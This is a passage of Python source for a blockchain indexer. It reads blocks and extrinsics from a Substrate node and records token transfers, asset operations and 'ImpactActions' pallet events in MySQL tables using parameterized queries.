CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table fttransactions...\")\n cursor.execute(createassets)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'fttransactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n\n #closing database\n cursor.close()\n cnx.close()\n# function to synchronise the blockchain reading the old blocks if not yet loaded\ndef sync_blockchain(substrate):\n # we get the last block from the blockchain\n r=substrate.rpc_request(method='chain_getHeader',params=[],result_handler=None)\n rs=r.get('result')\n lastblockhex=rs.get('number')\n lastblocknumber=int(lastblockhex,16)\n print(\"[Info] Last Block: \",lastblocknumber)\n
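\n # Example: chain_getHeader returns the block height as a hex string,\n # e.g. {\"result\": {\"number\": \"0x1f4\"}} -> int(\"0x1f4\", 16) == 500.\n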
 # we check the last block reconciled\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n cursor = cnx.cursor(dictionary=True)\n lastblocknumberverified=0\n query=\"select * from sync limit 1\"\n try:\n cursor.execute(query)\n for row in cursor:\n lastblocknumberverified=row['lastblocknumberverified']\n #lastblocknumberverified=row.get('lastblocknumberverified')\n except mysql.connector.Error as err:\n print(err.msg)\n lastblocknumberverified=0\n \n print(\"[INFO] Last block number verified:\",lastblocknumberverified)\n # loop over the new block numbers to find gaps and fill them if needed\n x=lastblocknumberverified+1\n cursor.close()\n cursorb = cnx.cursor()\n print(\"[INFO] Syncing previous blocks...\")\n while x<=lastblocknumber:\n # get block data\n print(\"Syncing block # \",x)\n # process the block of data\n process_block(x)\n # update sync\n sqlst=\"\"\n if(lastblocknumberverified==0):\n sqlst=\"insert into sync set lastblocknumberverified=\"+str(x)\n else:\n sqlst=\"update sync set lastblocknumberverified=\"+str(x)\n try:\n cursorb.execute(sqlst)\n cnx.commit()\n except mysql.connector.Error as err:\n print(err.msg)\n \n lastblocknumberverified=x\n # increase block number\n x=x+1\n #end while loop\n cursorb.close()\n cnx.close()\n\n\n\n# function to store a new transaction\ndef store_transaction(blocknumber,txhash,sender,recipient,amount,currenttime,gasfees):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Transaction\")\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Sender: \",sender)\n print(\"Recipient: \",recipient)\n print(\"Amount: \",amount)\n print(\"Gas fees: \",gasfees)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into transactions set blocknumber=%s,txhash=%s,sender=%s,recipient=%s,amount=%s,gasfees=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,sender,recipient,amount,gasfees,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Impact Action\ndef impactactions_newimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Impact Action\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",idimpactaction)\n print(\"Data: \",data)\n print(\"Category: \",j['category'])\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactions set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s\"\n addtx=addtx+\",description=%s,category=%s,auditors=%s,blockstart=%s,blockend=%s,rewardstoken=%s,rewardsamount=%s,rewardsoracle=%s\"\n addtx=addtx+\",rewardauditors=%s,slashingsauditors=%s,maxerrorsauditor=%s,fields=%s\"\n if 'fields' in j:\n f=j['fields']\n else: \n f={}\n datatx=(blocknumber,txhash,signer,dtblockchain,idimpactaction,j['description'],j['category'],j['auditors'],j['blockstart'],j['blockend'],j['rewardstoken'],j['rewardsamount'],j['rewardsoracle'],j['rewardsauditors'],j['slashingsauditors'],j['maxerrorsauditor'],json.dumps(f))\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Impact Actions\ndef impactactions_destroyimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Impact Action\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Impact Action: \",idimpactaction)\n cursor = cnx.cursor()\n 
dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactions where id=%s\"\n datatx=(idimpactaction,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Oracle\ndef impactactions_neworacle(blocknumber,txhash,signer,currenttime,idoracle,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Oracle\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",idoracle)\n print(\"Data: \",data)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsoracles set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s\"\n addtx=addtx+\",description=%s,account=%s,otherinfo=%s\"\n if 'otherinfo' in j:\n o=j['otherinfo']\n else: \n o=''\n datatx=(blocknumber,txhash,signer,dtblockchain,idoracle,j['description'],j['account'],o)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Oracle\ndef impactactions_destroyoracle(blocknumber,txhash,signer,currenttime,idoracle):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Oracle\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Oracle: \",idoracle)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsoracles where id=%s\"\n datatx=(idoracle,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Approval Request\ndef impactactions_newapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,info):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n print(\"Storing New Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",approvalrequestid)\n print(\"Info: \",info)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequests set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,info=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,info)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Vote Approval Request\ndef impactactions_voteapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n j=json.loads(data)\n vote=j['vote']\n otherinfo=j['otherinfo']\n print(\"Storing Vote of an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n 
print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Approval: \",approvalrequestid)\n print(\"Vote: \",vote)\n print(\"Other Info: \",otherinfo)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequestauditorvotes set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,vote=%s,otherinfo=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,vote,otherinfo)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Assign Auditor to Approval Request\ndef impactactions_assignauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor,maxdays):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n print(\"Storing Assigned Auditor for an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Approval Request Id: \",approvalrequestid)\n print(\"Auditor: \",auditor)\n print(\"Max days: \",maxdays)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequestsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,auditor=%s,maxdays=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,auditor,maxdays)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Auditor\ndef impactactions_destory_assignedauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Assigned Auditor to an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Approval Request id: \",approvalrequestid)\n print(\"Auditor: \",auditor)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsapprovalrequestsauditors where approvalrequestid=%s and auditor=%s\"\n datatx=(approvalrequestid,auditor)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Auditor\ndef impactactions_newauditor(blocknumber,txhash,signer,currenttime,account,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Auditor\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Account: \",account)\n print(\"Data: \",data)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s\"\n addtx=addtx+\",description=%s,account=%s,categories=%s,area=%s,otherinfo=%s\"\n if 
'otherinfo' in j:\n o=j['otherinfo']\n else: \n o=''\n datatx=(blocknumber,txhash,signer,dtblockchain,j['description'],account,json.dumps(j['categories']),j['area'],o)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Auditor\ndef impactactions_destroyauditor(blocknumber,txhash,signer,currenttime,account):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Auditor\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"account: \",account)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsauditors where account=%s\"\n datatx=(account,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Proxy\ndef impactactions_newproxy(blocknumber,txhash,signer,currenttime,idproxy, account):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Proxy\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Account: \",account)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsproxy set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s\"\n addtx=addtx+\",id=%s,account=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,idproxy,account)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Proxy\ndef impactactions_destroyproxy(blocknumber,txhash,signer,currenttime,idproxy):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Proxy\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"id Proxy: \",idproxy)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsproxy where id=%s\"\n datatx=(idproxy,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Category\ndef impactactions_newcategory(blocknumber,txhash,signer,currenttime,idcategory,description):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Category\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id category: \",idcategory)\n print(\"Description: \",description)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionscategories set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,description=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,idcategory,description)\n try:\n 
cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - Destroy Category\ndef impactactions_destroycategory(blocknumber,txhash,signer,currenttime,idcategory):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Category\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id category: \",idcategory)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionscategories where id=%s\"\n datatx=(idcategory,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to create new asset from Sudo\ndef assets_force_create(blocknumber,txhash,signer,currenttime,assetid,owner,maxzombies,minbalance):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Create Asset (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Owner : \",owner)\n print(\"Max Zombies : \",maxzombies)\n print(\"Min Balance : \",minbalance)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into ftassets set blocknumber=%s,txhash=%s,signer=%s,assetid=%s,owner=%s,maxzombies=%s,minbalance=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,assetid,owner,maxzombies,minbalance,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to mint assets in favor of an account\ndef assets_mint(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Minted\"\n print(\"Mint Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to burn assets decrease the balance of an account\ndef assets_burn(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Burned\"\n print(\"Burn Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n 
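# mint/burn/transfer rows all share the fttransactions table; the category\n    # column (\"Minted\", \"Burned\" or \"Transfer\") distinguishes the operation\n    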
dtblockchain=currenttime.replace(\"T\",\" \")\n    dtblockchain=dtblockchain[0:19]\n    addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n    datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n    try:\n        cursor.execute(addtx,datatx)\n    except mysql.connector.Error as err:\n        print(\"[Error] \",err.msg)\n    cnx.commit()\n    cursor.close()\n    cnx.close()\n# function to transfer assets in favor of an account\ndef assets_transfer(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n    cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n    category=\"Transfer\"\n    print(\"Transfer Assets (Fungible Tokens)\")\n    print(\"BlockNumber: \",blocknumber)\n    print(\"TxHash: \",txhash)\n    print(\"Current time: \",currenttime)\n    print(\"Signer: \",signer)\n    print(\"Asset Id : \",assetid)\n    print(\"Recipient : \",recipient)\n    print(\"Amount : \",amount)\n    cursor = cnx.cursor()\n    dtblockchain=currenttime.replace(\"T\",\" \")\n    dtblockchain=dtblockchain[0:19]\n    addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n    datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n    try:\n        cursor.execute(addtx,datatx)\n    except mysql.connector.Error as err:\n        print(\"[Error] \",err.msg)\n    cnx.commit()\n    cursor.close()\n    cnx.close()\n# function to force transfer assets in favor of an account\ndef assets_forcetransfer(blocknumber,txhash,signer,sender,currenttime,assetid,recipient,amount):\n    cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n    category=\"Transfer\"\n    print(\"Force Transfer Assets (Fungible Tokens)\")\n    print(\"BlockNumber: \",blocknumber)\n    print(\"TxHash: \",txhash)\n    print(\"Current time: \",currenttime)\n    print(\"Signer: \",signer)\n    print(\"Sender : \",sender)\n    print(\"Asset Id : \",assetid)\n    print(\"Recipient : \",recipient)\n    print(\"Amount : \",amount)\n    cursor = cnx.cursor()\n    dtblockchain=currenttime.replace(\"T\",\" \")\n    dtblockchain=dtblockchain[0:19]\n    addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n    # store the forced source account (sender), not the signer, in the sender column\n    datatx=(blocknumber,txhash,signer,sender,category,assetid,recipient,amount,dtblockchain)\n    try:\n        cursor.execute(addtx,datatx)\n    except mysql.connector.Error as err:\n        print(\"[Error] \",err.msg)\n    cnx.commit()\n    cursor.close()\n    cnx.close()\n# function to destroy asset (Fungible Tokens) from Sudo\ndef assets_force_destroy(blocknumber,txhash,signer,currenttime,assetid,witnesszombies):\n    cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n    print(\"Destroy Asset (Fungible Tokens)\")\n    print(\"BlockNumber: \",blocknumber)\n    print(\"TxHash: \",txhash)\n    print(\"Current time: \",currenttime)\n    print(\"Signer: \",signer)\n    print(\"Asset Id: \",assetid)\n    print(\"Witnesses Zombies: \",witnesszombies)\n    cursor = cnx.cursor()\n    dtblockchain=currenttime.replace(\"T\",\" \")\n    dtblockchain=dtblockchain[0:19]\n    deltx=\"delete from ftassets where assetid=%s\"\n    datatx=(assetid,)\n    try:\n        cursor.execute(deltx,datatx)\n    except mysql.connector.Error as err:\n        print(\"[Error] \",err.msg)\n    cnx.commit()\n    cursor.close()\n    cnx.close()\n# function to process a block of data\ndef process_block(blocknumber):\n    # Retrieve extrinsics in block\n    print(\"Processing Block # \",blocknumber)\n    result = 
substrate.get_block(block_number=blocknumber)\n    print (\"##########################\")\n    print(result)\n    print(\"Block Hash: \",result['header']['hash'])\n    blockhash=result['header']['hash']\n    print (\"##########################\")\n    events=substrate.get_events(result['header']['hash'])\n    print (\"#######EVENTS##############\")\n    print(events)\n    print (\"##########################\")\n    # retrieve receipt\n    cnt=0 \n    for extrinsic in result['extrinsics']:\n        if extrinsic.address:\n            signed_by_address = extrinsic.address.value\n        else:\n            signed_by_address = None\n        print('\\nPallet: {}\\nCall: {}\\nSigned by: {}'.format(\n            extrinsic.call_module.name,\n            extrinsic.call.name,\n            signed_by_address\n        ))\n        # check for extrinsic success or failure\n        try:\n            error=events[cnt].params[0]['value'].get('Error')\n        except:\n            error=None\n        if events[cnt].event.name==\"ExtrinsicFailed\" or error!=None :\n            print(\"Extrinsic has failed\")\n            cnt=cnt+1\n            continue\n        else:\n            print(\"Extrinsic succeeded: \",events[cnt].event.name)\n        print(\"extrinsic.extrinsic_hash: \",extrinsic.extrinsic_hash)\n        print(\"extrinsic: \",extrinsic)\n        print(\"blockhash: \",blockhash)\n        gasfees=0\n        if (extrinsic.extrinsic_hash!=None):\n            # get receipt of the extrinsic\n            receipt = ExtrinsicReceipt(\n                substrate=substrate,\n                extrinsic_hash=extrinsic.extrinsic_hash,\n                block_hash=blockhash\n            )\n            print(\"************RECEIPT**************\")\n            print(\"blockhash: \",blockhash)\n            print(\"extrinsic.extrinsic_hash: \",extrinsic.extrinsic_hash)\n            print(\"receipt.total_fee_amount: \",receipt.total_fee_amount)\n            print(receipt.is_success) \n            print(receipt.extrinsic.call_module.name) \n            print(receipt.extrinsic.call.name) \n            print(receipt.weight) \n            print(\"*********************************\")\n            gasfees=receipt.total_fee_amount\n        #for Timestamp call we set the time of the following transactions\n        if extrinsic.call_module.name==\"Timestamp\" and extrinsic.call.name==\"set\":\n            currentime=extrinsic.params[0]['value']\n        #Balance Transfer we update the transactions\n        if extrinsic.call_module.name==\"Balances\" and ( extrinsic.call.name==\"transfer\" or extrinsic.call.name==\"transfer_keep_alive\"):\n            ## store the transaction in the database\n            store_transaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,extrinsic.params[0]['value'],extrinsic.params[1]['value'],currentime,gasfees)\n        #Impact Actions - Vote Approval Request\n        if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"vote_approval_request\":\n            impactactions_voteapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])\n        #Impact Actions - New Approval Request\n        if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"request_approval\":\n            impactactions_newapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value']) \n        #Impact Actions - Assign Auditor to Approval Request\n        if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"assign_auditor\":\n            impactactions_assignauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value']) \n        #Impact Actions - Remove Assigned Auditor to Approval Request\n        if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"destroy_assigned_auditor\":\n            
impactactions_destory_assignedauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value']) \n #Assets - Create new asset as regular user\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"create\":\n assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'],extrinsic.params[3]['value'])\n #Assets - Destroy asset as regular user\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"destroy\":\n assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])\n #Assets - Mint assets in favor of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"mint\":\n assets_mint(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n #Assets - Burn assets decreasing the balance of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"burn\":\n assets_burn(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n #Assets - Transfer assets in favor of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"transfer\":\n assets_transfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n # Sudo Calls\n if extrinsic.call_module.name==\"Sudo\" and extrinsic.call.name==\"sudo\":\n print(extrinsic.params[0].get('value'))\n c=extrinsic.params[0].get('value')\n # new impact action\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_impact_action':\n print(\"Impact Actions - Create New Impact Action\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_newimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy impact action\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_impact_action':\n print(\"Impact Actions - Destroy Impact Action\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new oracle\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_oracle':\n print(\"Impact Actions - Create New Oracle\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_neworacle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy oracle\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_oracle':\n print(\"Impact Actions - Destroy Oracle\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyoracle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new auditor\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_auditor':\n print(\"Impact Actions - Create 
